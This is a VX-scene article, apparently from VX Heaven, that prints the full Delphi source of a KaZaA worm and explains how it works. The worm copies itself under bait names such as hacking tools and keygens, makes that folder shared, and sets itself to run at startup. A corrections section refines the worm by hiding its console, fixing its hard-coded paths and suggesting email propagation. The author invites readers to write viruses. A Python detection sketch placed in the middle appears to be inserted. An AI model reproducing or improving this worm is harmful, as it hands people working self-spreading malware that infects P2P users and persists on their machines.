VX Heaven

Simple worm in Delphi and corrections

Hutley
Ready Rangers Liberation Front [7]
July 2006

Introduction

Here I will explain the code of my first worm, written entirely in Delphi. It was my first creation of the worm type, because until then I had made only one Trojan and a backdoor creator for mIRC. As I did not know very well how a worm ought to be, I programmed it along the lines of some things I had already done with the Legionário Trojan, my first creation for the VX world. After it was programmed and distributed, I decided to publish the code to get the opinion of other people who had been in the field longer than I had.

At that time I was in another group (GEDZAC), so I asked the other members for help in evaluating my code and pointing out the errors.

The result was excellent. Those men (MachineDramon, Falckon, Sr.Muerte, Pana_Infierno, DemionKlaz, and others) showed spectacular goodwill in telling me where I had made errors and what the right way of doing things was, so that my worm would not lose its effectiveness.

The source code

program porn;

{$APPTYPE CONSOLE}

{       I-Worm.Hutley.Cris
        Brasil! Rulez! }


// Please KAV Lab. this is I-Worm.Hutley.Cris
// it's the original name! Understand?
uses
        Windows, SysUtils, Registry;

procedure ExecutaViaRegistro(nome, path: string);
var evrg: TRegistry;
begin
        evrg := TRegistry.Create;
        evrg.RootKey := HKEY_LOCAL_MACHINE;
        evrg.OpenKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Run', FALSE);
        evrg.WriteString(nome, path);
        evrg.Destroy;
end;

procedure Kazaa;
var reg: Tregistry;
        Cris: array[0..260] of Char;
begin
        reg := TRegistry.Create;
        reg.RootKey := HKEY_CURRENT_USER;
        reg.OpenKey('Software\Kazaa\LocalContent', True);
        reg.WriteString('DisableSharing', '0');
        reg.writestring('dir0', '012345:' + 'C:\Windows\files');
        reg.writestring('dir1', '012345:' + 'C:\Windows\files');
        reg.writestring('dir2', '012345:' + 'C:\Windows\files');
        reg.writestring('dir3', '012345:' + 'C:\Windows\files');
        reg.writestring('dir4', '012345:' + 'C:\Windows\files');
        reg.writestring('dir5', '012345:' + 'C:\Windows\files');
        CreateDirectory('C:\windows\files', nil);
        GetModuleFileNameA(0, Cris, SizeOf(Cris));
        CopyFile(Cris, 'C:\Windows\files\hotmail_hacker.exe', True);
        CopyFile(Cris, 'C:\Windows\files\hotmail_cracker.exe', True);
        CopyFile(Cris, 'C:\Windows\files\hotmail_account_sniffer.exe', True);
        CopyFile(Cris, 'C:\Windows\files\aim_hack.exe', True);
        CopyFile(Cris, 'C:\Windows\files\msn_crack.exe', True);
        CopyFile(Cris, 'C:\Windows\files\icq_hack.exe', True);
        CopyFile(Cris, 'C:\Windows\files\WarDialer.exe', True);
        CopyFile(Cris, 'C:\Windows\files\Delphi 6 - Serial Gen.exe', True);
        CopyFile(Cris, 'C:\Windows\files\WinxpHack.exe', True);
        CopyFile(Cris, 'C:\Windows\files\Delphi 7 Crack.exe', True);
        CopyFile(Cris, 'C:\Windows\files\win2k_serial_gen.exe', True);
        CopyFile(Cris, 'C:\Windows\files\yahoo_hack.exe', True);
        CopyFile(Cris, 'C:\Windows\files\ftp_crack.exe', True);
        CopyFile(Cris, 'C:\Windows\files\XP_keygen.exe', True);
        CopyFile(Cris, 'C:\Windows\files\PS2_emulator_bleem.exe', True);
        CopyFile(Cris, 'C:\Windows\files\win2k_pass_decryptor.exe', True);
        CopyFile(Cris, 'C:\Windows\files\Win2k_reboot_exploit.exe', True);
        CopyFile(Cris, 'C:\Windows\files\IIS_ShellBind.exe', True);
        CopyFile(Cris, 'C:\Windows\files\WinZip_KeyGen.exe', True);
        CopyFile(Cris, 'C:\Windows\files\Counter Strike_CD_Keygen.exe', True);
        CopyFile(Cris, 'C:\Windows\files\Delphi 2005 Keygen.exe', True);
        CopyFile(Cris, 'C:\Windows\files\Delphi 9 Keygen.exe', True);
        CopyFile(Cris, 'C:\Windows\files\Half_life Cd keygen.exe', True);
        CopyFile(Cris, 'C:\Windows\files\Hotmail Hacker.exe', True);
        CopyFile(Cris, 'C:\Windows\files\ICQ_Hackingtools.exe', True);
        CopyFile(Cris, 'C:\Windows\files\invisible_IP.exe', True);
end;

var
        Cris: array[0..260] of Char;
 
begin
        GetModuleFileNameA(0, Cris, SizeOf(Cris));
        if not (FileExists('C:\Windows\WinExec.exe')) then
        begin
                CopyFile(Cris, 'C:\Windows\WinExec.exe', True);
                ExecutaViaRegistro('WinExec', 'C:\Windows\WinExec.exe');
        end else
                ExecutaViaRegistro('WinExec', 'C:\Windows\WinExec.exe');
        Kazaa;
end.
 

An explanation

All this worm does is copy itself into a folder that it creates. After copying itself there under several other names, it accesses the system registry and makes that folder shared by KaZaA. It also creates a single copy of itself in the Windows folder and writes to the registry so that it is executed every time Windows starts.
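Seen from the defender's side, the behaviour described above leaves three artifacts that can be correlated: one file hash present under many different .exe names, a KaZaA dirN value sharing the folder that holds them, and a Run value starting another copy. The Python sketch below is an added example, not code from the original article; it assumes the registry values and a path/hash inventory have already been exported into the structures shown, and all sample data (including the placeholder hashes and the SomeUpdater entry) is constructed.

```python
import ntpath
import re
from collections import defaultdict

# Constructed sample data, not from a real host; hashes are placeholders.
RUN_VALUES = {  # HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    "WinExec": r"E:\WINDOWS\WinExec.exe",
    "SomeUpdater": r'"C:\Program Files\Vendor\updater.exe"',
}
KAZAA_VALUES = {  # HKCU\Software\Kazaa\LocalContent
    "DisableSharing": "0",
    "dir0": r"012345:E:\WINDOWS\files",
    "dir1": r"012345:D:\Music",
}
INVENTORY = [  # (path, file hash) pairs from any file-inventory tool
    (r"E:\WINDOWS\WinExec.exe", "aa11"),
    (r"E:\WINDOWS\files\hotmail_hacker.exe", "aa11"),
    (r"E:\WINDOWS\files\aim_hack.exe", "aa11"),
    (r"E:\WINDOWS\files\XP_keygen.exe", "aa11"),
    (r"C:\Program Files\Vendor\updater.exe", "cc33"),
]

def shared_dirs(kazaa_values):
    """Folders published through dirN values; the data is '<digits>:<path>'."""
    dirs = set()
    for name, data in kazaa_values.items():
        m = re.fullmatch(r"\d+:(.+)", data)
        if m and re.fullmatch(r"dir\d+", name, re.I):
            dirs.add(ntpath.normcase(m.group(1).rstrip("\\")))
    return dirs

def clone_groups(inventory, min_copies=3):
    """Hashes that appear under several different .exe paths."""
    by_hash = defaultdict(set)
    for path, digest in inventory:
        if path.lower().endswith(".exe"):
            by_hash[digest].add(ntpath.normcase(path))
    return {h: p for h, p in by_hash.items() if len(p) >= min_copies}

def findings(run_values, kazaa_values, inventory):
    """Report a hash only if it autostarts AND has clones in a shared folder."""
    shared, out = shared_dirs(kazaa_values), []
    for digest, paths in clone_groups(inventory).items():
        baits = sorted(p for p in paths if ntpath.dirname(p) in shared)
        autorun = sorted(n for n, cmd in run_values.items()
                         if ntpath.normcase(cmd.strip('"')) in paths)
        if baits and autorun:
            out.append({"hash": digest, "run": autorun, "shared": baits})
    return out
```

Because the match is on hash reuse and on the relationship between the three artifacts, it does not depend on the drive letter, the folder name or the bait file names.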

The correction

1 - {$APPTYPE CONSOLE}

This snippet, in Delphi, is called a "compiler directive". Removing this directive means that the console window does not appear. The correct thing is to remove it.

2 - CopyFile(Cris, 'C:\Windows\files\hotmail_hacker.exe', True);

This line has a good idea behind it, but its effectiveness is compromised.

It is compromised for two reasons. First, it copies itself into a folder that will be added as shared by KaZaA, which implies that if the user does not have KaZaA the worm will not spread. Second, as you must already have noticed, the full path of the file is hard-coded, which compromises the worm if the user has Windows installed, for example, on drive E:.

The way to solve these two problems would be to add the ability to also propagate by email and other P2P programs. As for the full-path problem, it is necessary to add to the code a function that returns the Windows folder; then it is enough to append "files\hotmail_hacker.exe" and the problem is solved. Here is the function that returns the Windows folder.

function WinDir: string;
begin
  SetLength(Result, MAX_PATH);
  Windows.GetWindowsDirectory(PChar(Result), MAX_PATH);
  Result := string(PChar(Result)) + '\';
end;
 

With this function in the code, that same line would look like this:

CopyFile(Cris, WinDir + 'files\hotmail_hacker.exe', True);
 

The same thing applies to the commands:

reg.writestring('dir0', '012345:' + 'C:\Windows\files');
 

and also to:

ExecutaViaRegistro('WinExec', 'C:\Windows\WinExec.exe');
 

The end

These are the biggest problems of this basic worm that I once racked my brain to develop. I hope to have helped introduce a few more coders to this wonderful world of creating viruses/worms/trojans.

With the VX world shrinking more and more, I believe it is important to write basic beginner articles using an easy-to-learn, high-level language such as Delphi.

That is all, folks.

Suggestions, criticism: [email protected] - www.hutley.cjb.net
